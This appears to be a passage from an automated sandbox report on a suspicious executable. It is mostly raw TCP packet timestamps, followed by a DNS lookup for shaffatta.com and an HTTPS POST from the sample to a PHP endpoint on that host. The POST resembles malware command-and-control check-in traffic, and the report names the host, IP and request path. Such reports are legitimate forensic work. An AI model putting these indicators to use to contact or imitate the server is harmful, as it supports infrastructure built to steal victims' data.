                                                                                                    May 3, 2024 11:21:44.990164042 CEST49752443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:44.990170956 CEST44349752168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:44.990354061 CEST49752443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:44.990359068 CEST44349752168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:44.990380049 CEST49752443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:44.990386963 CEST44349752168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:45.465241909 CEST44349752168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:45.465333939 CEST44349752168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:45.465346098 CEST49752443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:45.465379953 CEST49752443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:45.477766037 CEST49752443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:45.477790117 CEST44349752168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:45.477802992 CEST49752443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:45.477847099 CEST49752443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:46.968208075 CEST49753443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:46.968252897 CEST44349753168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:46.968334913 CEST49753443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:46.968758106 CEST49753443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:46.968770981 CEST44349753168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:47.327225924 CEST44349753168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:47.327367067 CEST49753443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:47.327848911 CEST49753443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:47.327861071 CEST44349753168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:47.328059912 CEST49753443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:47.328064919 CEST44349753168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:47.778548002 CEST44349753168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:47.778569937 CEST44349753168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:47.778637886 CEST44349753168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:47.778639078 CEST49753443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:47.778680086 CEST49753443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:47.802990913 CEST49753443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:47.803016901 CEST44349753168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:47.880935907 CEST49754443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:47.880970955 CEST44349754168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:47.881036043 CEST49754443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:47.890445948 CEST49754443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:47.890458107 CEST44349754168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:48.249000072 CEST44349754168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:48.249105930 CEST49754443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:48.249860048 CEST49754443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:48.249870062 CEST44349754168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:48.250323057 CEST49754443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:48.250328064 CEST44349754168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:48.702121019 CEST44349754168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:48.702203989 CEST44349754168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:48.702204943 CEST49754443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:48.702254057 CEST49754443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:48.702433109 CEST49754443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:48.702450991 CEST44349754168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:48.734616041 CEST49755443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:48.734673977 CEST44349755168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:48.734767914 CEST49755443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:48.734991074 CEST49755443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:48.735007048 CEST44349755168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:49.091419935 CEST44349755168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:49.091578960 CEST49755443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:49.092535019 CEST49755443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:49.092544079 CEST44349755168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:49.092703104 CEST49755443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:49.092708111 CEST44349755168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:49.092727900 CEST49755443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:49.092735052 CEST44349755168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:49.562674046 CEST44349755168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:49.562756062 CEST49755443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:49.562767982 CEST44349755168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:49.562911987 CEST49755443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:49.562933922 CEST49755443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:49.562953949 CEST44349755168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:49.562969923 CEST49755443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:49.563003063 CEST49755443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:49.568809032 CEST49756443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:49.568839073 CEST44349756168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:49.568918943 CEST49756443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:49.569143057 CEST49756443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:49.569158077 CEST44349756168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:49.928286076 CEST44349756168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:49.928371906 CEST49756443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:49.928925991 CEST49756443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:49.928934097 CEST44349756168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:49.929121017 CEST49756443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:49.929127932 CEST44349756168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:49.929189920 CEST49756443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:49.929195881 CEST44349756168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:50.395921946 CEST44349756168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:50.395994902 CEST44349756168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:50.396025896 CEST49756443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:50.396051884 CEST49756443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:51.724502087 CEST49756443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:51.724525928 CEST44349756168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:51.724535942 CEST49756443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:51.724585056 CEST49756443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:51.752257109 CEST49757443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:51.752290010 CEST44349757168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:51.752352953 CEST49757443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:51.753263950 CEST49757443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:51.753278971 CEST44349757168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:52.110465050 CEST44349757168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:52.110569000 CEST49757443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:52.114197016 CEST49757443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:52.114207983 CEST44349757168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:52.114366055 CEST49757443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:52.114372969 CEST44349757168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:52.114403963 CEST49757443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:52.114413977 CEST44349757168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:52.580144882 CEST44349757168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:52.580208063 CEST49757443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:52.580226898 CEST44349757168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:52.580245018 CEST44349757168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:52.580272913 CEST49757443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:52.580296993 CEST49757443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:52.581002951 CEST49757443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:52.581022978 CEST44349757168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:52.581032991 CEST49757443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:52.581074953 CEST49757443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:52.605756044 CEST49758443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:52.605792999 CEST44349758168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:52.605863094 CEST49758443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:52.606142998 CEST49758443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:52.606168032 CEST44349758168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:52.962366104 CEST44349758168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:52.962455988 CEST49758443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:52.962990999 CEST49758443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:52.963002920 CEST44349758168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:52.963146925 CEST49758443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:52.963152885 CEST44349758168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:52.963172913 CEST49758443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:52.963182926 CEST44349758168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:53.426831007 CEST44349758168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:53.426914930 CEST44349758168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:53.426922083 CEST49758443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:53.426968098 CEST49758443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:53.427109957 CEST49758443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:53.427124977 CEST44349758168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:53.427156925 CEST49758443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:53.427175999 CEST49758443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:53.439668894 CEST49759443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:53.439699888 CEST44349759168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:53.439872980 CEST49759443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:53.440061092 CEST49759443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:53.440076113 CEST44349759168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:53.797169924 CEST44349759168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:53.797245979 CEST49759443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:53.797822952 CEST49759443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:53.797831059 CEST44349759168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:53.798008919 CEST49759443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:53.798015118 CEST44349759168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:53.798063040 CEST49759443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:53.798074007 CEST44349759168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:54.263678074 CEST44349759168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:54.263763905 CEST44349759168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:54.263787985 CEST49759443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:54.263811111 CEST49759443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:54.263935089 CEST49759443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:54.263950109 CEST44349759168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:54.263963938 CEST49759443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:54.264023066 CEST49759443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:54.269741058 CEST49760443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:54.269767046 CEST44349760168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:54.269921064 CEST49760443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:54.270148993 CEST49760443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:54.270153046 CEST44349760168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:54.627109051 CEST44349760168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:54.627264023 CEST49760443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:54.627883911 CEST49760443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:54.627891064 CEST44349760168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:54.628125906 CEST49760443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:54.628132105 CEST44349760168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:54.628195047 CEST49760443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:54.628200054 CEST44349760168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:55.098516941 CEST44349760168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:55.098601103 CEST44349760168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:55.098622084 CEST49760443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:55.098660946 CEST49760443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:55.098742962 CEST49760443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:55.098763943 CEST44349760168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:55.098774910 CEST49760443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:55.098824978 CEST49760443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:55.104463100 CEST49761443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:55.104506016 CEST44349761168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:55.104572058 CEST49761443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:55.104856968 CEST49761443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:55.104870081 CEST44349761168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:55.461517096 CEST44349761168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:55.461630106 CEST49761443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:55.462435961 CEST49761443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:55.462445974 CEST44349761168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:55.462677956 CEST49761443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:55.462682962 CEST44349761168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:55.462743998 CEST49761443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:55.462749004 CEST44349761168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:55.931942940 CEST44349761168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:55.932019949 CEST44349761168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:55.932061911 CEST49761443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:55.932077885 CEST49761443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:55.932210922 CEST49761443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:55.932235956 CEST44349761168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:55.932248116 CEST49761443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:55.932284117 CEST49761443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:55.939932108 CEST49762443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:55.939974070 CEST44349762168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:55.940053940 CEST49762443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:55.940555096 CEST49762443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:55.940571070 CEST44349762168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:56.299690962 CEST44349762168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:56.299885988 CEST49762443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:56.300647974 CEST49762443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:56.300656080 CEST44349762168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:56.300831079 CEST49762443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:56.300837040 CEST44349762168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:56.300858974 CEST49762443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:56.300863981 CEST44349762168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:56.771049976 CEST44349762168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:56.771214008 CEST44349762168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:56.771215916 CEST49762443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:56.771348000 CEST49762443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:56.771572113 CEST49762443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:56.771589041 CEST44349762168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:56.771611929 CEST49762443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:56.771635056 CEST49762443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:56.777695894 CEST49763443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:56.777725935 CEST44349763168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:56.777797937 CEST49763443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:56.778012991 CEST49763443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:56.778029919 CEST44349763168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:57.135435104 CEST44349763168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:57.135570049 CEST49763443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:57.408890009 CEST49763443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:57.408919096 CEST44349763168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:57.473676920 CEST49763443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:57.473701954 CEST44349763168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:57.473896027 CEST49763443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:57.473901987 CEST44349763168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:57.943859100 CEST44349763168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:57.943928003 CEST44349763168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:57.943974972 CEST49763443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:57.946409941 CEST49763443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:59.378160000 CEST49763443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:59.378197908 CEST44349763168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:59.378211975 CEST49763443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:59.378298998 CEST49763443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:59.531254053 CEST49764443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:59.531296968 CEST44349764168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:59.531359911 CEST49764443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:59.532444000 CEST49764443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:59.532459974 CEST44349764168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:59.890269995 CEST44349764168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:59.890398979 CEST49764443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:59.890863895 CEST49764443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:59.890872002 CEST44349764168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:59.891078949 CEST49764443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:59.891084909 CEST44349764168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:21:59.891109943 CEST49764443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:21:59.891119003 CEST44349764168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:22:00.364392996 CEST44349764168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:22:00.364487886 CEST49764443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:22:00.364495039 CEST44349764168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:22:00.364571095 CEST49764443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:22:00.364664078 CEST49764443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:22:00.364681959 CEST44349764168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:22:00.364708900 CEST49764443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:22:00.364734888 CEST49764443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:22:00.371419907 CEST49765443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:22:00.371455908 CEST44349765168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:22:00.371535063 CEST49765443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:22:00.371750116 CEST49765443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:22:00.371762991 CEST44349765168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:22:00.731889009 CEST44349765168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:22:00.731970072 CEST49765443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:22:00.732898951 CEST49765443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:22:00.732907057 CEST44349765168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:22:00.733087063 CEST49765443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:22:00.733092070 CEST44349765168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:22:00.733130932 CEST49765443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:22:00.733134985 CEST44349765168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:22:01.200330019 CEST44349765168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:22:01.200398922 CEST44349765168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:22:01.200566053 CEST49765443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:22:01.200683117 CEST49765443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:22:01.200683117 CEST49765443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:22:01.200696945 CEST44349765168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:22:01.200767040 CEST49765443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:22:01.212821960 CEST49766443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:22:01.212857962 CEST44349766168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:22:01.212954044 CEST49766443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:22:01.213289976 CEST49766443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:22:01.213304996 CEST44349766168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:22:01.569478035 CEST44349766168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:22:01.569670916 CEST49766443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:22:01.570060968 CEST49766443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:22:01.570071936 CEST44349766168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:22:01.570250988 CEST49766443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:22:01.570255995 CEST44349766168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:22:01.570302010 CEST49766443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:22:01.570307970 CEST44349766168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:22:02.041265965 CEST44349766168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:22:02.041338921 CEST49766443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:22:02.041343927 CEST44349766168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:22:02.041395903 CEST49766443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:22:02.041455030 CEST49766443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:22:02.041474104 CEST44349766168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:22:02.041485071 CEST49766443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:22:02.041554928 CEST49766443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:22:02.047574043 CEST49767443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:22:02.047606945 CEST44349767168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:22:02.047699928 CEST49767443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:22:02.047897100 CEST49767443192.168.2.4168.119.248.46
                                                                                                    May 3, 2024 11:22:02.047913074 CEST44349767168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:22:02.404110909 CEST44349767168.119.248.46192.168.2.4
                                                                                                    May 3, 2024 11:22:02.404323101 CEST49767443192.168.2.4168.119.248.46

                                                                                                    UDP Packets

                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    May 3, 2024 11:21:23.112216949 CEST5559853192.168.2.41.1.1.1
                                                                                                    May 3, 2024 11:21:23.303493023 CEST53555981.1.1.1192.168.2.4

                                                                                                    DNS Queries

                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                    May 3, 2024 11:21:23.112216949 CEST192.168.2.41.1.1.10x5162Standard query (0)shaffatta.comA (IP address)IN (0x0001)false

                                                                                                    DNS Answers

                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                    May 3, 2024 11:21:23.303493023 CEST1.1.1.1192.168.2.40x5162No error (0)shaffatta.com168.119.248.46A (IP address)IN (0x0001)false

                                                                                                    HTTP Request Dependency Graph

                                                                                                    • shaffatta.com

                                                                                                    HTTPS Proxied Packets

                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.449737168.119.248.464436936C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-05-03 09:21:24 UTC200OUTPOST /fdca69ae739b4897.php HTTP/1.1
                                                                                                    Content-Type: multipart/form-data; boundary=----CFIECFIJDAAKEBGCGHIE
                                                                                                    Host: shaffatta.com
                                                                                                    Content-Length: 216
                                                                                                    Connection: Keep-Alive
                                                                                                    Cache-Control: no-cache
